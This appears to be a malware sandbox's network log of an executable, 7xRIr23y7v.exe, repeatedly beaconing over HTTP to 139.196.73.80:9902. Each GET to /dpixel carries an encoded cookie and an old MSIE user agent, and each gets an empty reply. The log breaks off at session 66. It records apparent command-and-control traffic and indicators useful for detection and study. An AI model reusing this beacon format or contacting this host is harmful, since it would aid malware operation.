Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49776	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:54.916657925 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:55.246622086 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49777	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:55.709172010 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:56.059880972 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49778	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:56.489833117 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:56.809098005 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49779	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:57.311469078 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:57.669955969 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49780	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:58.094777107 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:58.420608044 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49781	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:58.862082958 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:59.193543911 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49782	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:59.622862101 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:59.960019112 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49783	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:00.396369934 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:00.714998960 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49784	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:01.157025099 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:01.485349894 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49785	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:01.936640024 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:02.283452988 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49786	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:02.719592094 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:03.047669888 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49787	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:03.495831013 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:03.821366072 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49788	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:04.255625963 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:04.574947119 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49789	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:05.099453926 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:05.431288004 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49790	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:06.680625916 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:07.001836061 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49791	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:07.523626089 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:07.874640942 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49792	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:08.313241005 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:09.001722097 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:09.351041079 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49793	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:09.785763025 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:10.129580975 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49794	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:10.561634064 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:10.881982088 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49795	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:11.302915096 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:11.623888969 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49796	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:12.055413008 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:12.374974966 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49797	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:12.815674067 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:13.153424978 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49798	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:13.600965023 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:14.298609018 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:15.282890081 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:15.618978024 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49799	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:16.035433054 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:16.350776911 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49800	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:16.792721033 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:17.119940042 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49801	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:17.563812971 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:17.905805111 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49802	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:18.351878881 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:18.668164968 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49803	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
